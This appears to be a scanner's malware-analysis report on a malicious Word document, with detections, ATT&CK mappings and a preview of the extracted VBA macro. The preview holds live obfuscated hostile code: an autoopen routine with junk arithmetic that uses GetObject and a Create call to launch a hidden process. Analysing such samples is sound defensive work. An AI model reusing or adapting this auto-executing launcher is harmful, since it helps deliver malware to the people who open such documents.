MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present and utilizes a GetObject call, indicating an attempt to execute code. The presence of legacy WordBasic auto-exec markers and the critical ClamAV detection further support its malicious nature. The macro's obfuscated nature and the use of GetObject suggest it's designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Dsdu-6905405-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dsdu-6905405-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12497 bytes |
SHA-256: 9de68d5c71c8bce0aa769e92cddf18e3ebb8d55d290ee5f363ddab602a863dea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "V_AQxA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QXBAAA"
Attribute VB_Base = "0{232B3040-6D07-46B7-8AEA-9D06B39D66BE}{2F1EA1D3-2399-4010-BF69-5157FE5CC004}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oC4B4A"
Sub autoopen()
On Error Resume Next
If LQkACU = FBAAA_AQ Then
w4XkGAC = (207318623)
FU_A4A = (A14QUGAQ * CInt(407771253 _
+ Atn(222480772 * oAQDQAA)) + RUABxAAD + CDbl(L1kAAc - Sqr(bDkUAk / _
CBool(955581245 / 287618393) + SwDkDA - Rnd(sCUCAAA))) * 115001129 * 886426616)
U1DDxUxA = (939469626)
End If
If VBxQQc = h4BABw Then
qU14Ao = (281614625)
HXoZBcA = (txxwDk * CInt(148996833 _
+ Atn(435203762 * ABAwAD)) + hZAQBA + CDbl(pAAAAA1 - Sqr(YABAA_A / _
CBool(944893507 / 60178560) + FcBACoAA - Rnd(XAAUADQ))) * 146479080 * 568305737)
Ro4X1x = (489054753)
End If
If SAwDwU = TUkwAcC Then
UDAUwA = (545227970)
LAUAoZ = (PABBCCU * CInt(676242049 _
+ Atn(2004818 * GxAxcD)) + wokcGBx + CDbl(uAZ4CBU - Sqr(cAAAUw / _
CBool(25682111 / 541253005) + d1UAAA - Rnd(JAAAAAC))) * 783889166 * 759727341)
IACoGQc = (321608616)
End If
Set zo4BBcGA = GetObject(Z__ZACZ + QXBAAA.i4xkAXUA + tAAcxoGA)
If sXDADkk = kQ_AU__ Then
d_AGCA = (288765909)
UB1QUQ_ = (uADAZGG * CInt(6970405 _
+ Atn(137712537 * nDDDAwC4)) + BoDAA1 + CDbl(ICCXc4 - Sqr(QCAxCAAQ / _
CBool(735086908 / 300383593) + aX4oDwoA - Rnd(oU_Bc1A))) * 564481517 * 130008187)
LocAA1DA = (549184604)
End If
If pZGwAowG = JxXAcC Then
YAGQkAo = (114579851)
bAABAXD1 = (Xo_AoXUw * CInt(829280736 _
+ Atn(859915205 * V4AZAx)) + R1ABAUB4 + CDbl(MUAUk4 - Sqr(vAXG1BA / _
CBool(414967801 / 842908985) + qADAQ4AU - Rnd(ZADQAAQ_))) * 720686101 * 492679830)
Vk_BGx = (317047363)
End If
If NAwDUAAA = TQxBX1oC Then
XQwDBk = (823700352)
kABAcDQ = (OwDDBAQA * CInt(153520158 _
+ Atn(939920494 * QXwQ1Z)) + p4Aokk + CDbl(sAQUAAG4 - Sqr(JAQACow / _
CBool(214387552 / 382535454) + HGBwAx - Rnd(Kc__AA))) * 102946009 * 167549854)
NZABA1 = (119247067)
End If
zo4BBcGA.ShowWindow = 298336 - 298336
If o1QG4cQ = uD1AAcX Then
WBwkAXUo = (399550076)
LUCUA1 = (UA4_Ak * CInt(81554373 _
+ Atn(842863109 * fDAwAU)) + hBACUB + CDbl(UXkoAA - Sqr(vABD1x / _
CBool(653588024 / 352182117) + ocwxAAAx - Rnd(iA_xxAU))) * 881236961 * 720215043)
zAA1Bo = (152773677)
End If
If PDcBBAA = ockBZQBB Then
BQQxAAAC = (723241726)
iUAAGXAU = (rDAUc4D1 * CInt(727216091 _
+ Atn(526127557 * RkBQDA)) + lXXAk1 + CDbl(rB1ok1X - Sqr(PAAAAcQ / _
CBool(444628792 / 429440776) + nABDQG - Rnd(IX4UABA))) * 144383498 * 239351901)
BAAAAA = (608721218)
End If
GetObject(W1GCBQ + QXBAAA.N_BDAoG + JDAAQAAU). _
Create@ DXBQA1A + QXBAAA.dxxQBQZA + nAAAAA_ + QXBAAA.RAAwQQ + vAADQUAQ + QXBAAA.zADUcAQA + UAADwkAo, ZD41XACA, zo4BBcGA, WDQBQU
If EAADBZA = GACU1Ak Then
aAwDA4_A = (496748349)
wCUAAAxc = (JcAQAcA * CInt(242897286 _
+ Atn(402902910 * wABwwx)) + uQxAAQX + CDbl(wckkoUAA - Sqr(ZAADDCA / _
CBool(950826652 / 896583089) + K1QDAoXA - Rnd(NAC1AXAD))) * 657129219 * 241113497)
YxcA_AwB = (584162951)
End If
If zBGkU4 = uUXBBwAA Then
iAACAA = (260027090)
kc14BAo = (iAQQAA4 * CInt(167038775 _
+ Atn(674351520 * mAA_xUG)) + FAoBA4 + CDbl(FA1cABB - Sqr(pAcDBAB / _
CBool(294797125 / 604420666) + rBB4Ao_A - Rnd(bBUxAxUB))) * 411144586 * 392351117)
TAUDGQ = (867134419)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/bd58ac5654864b1b8a1fa2aa3fa93b97.bin
' ===============================================================================
' Module streams:
' Macros/VBA/V_AQxA - 1104 bytes
' Macros/VBA/QXBAAA - 1157 bytes
' Macros/VBA/oC4B4A - 579
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.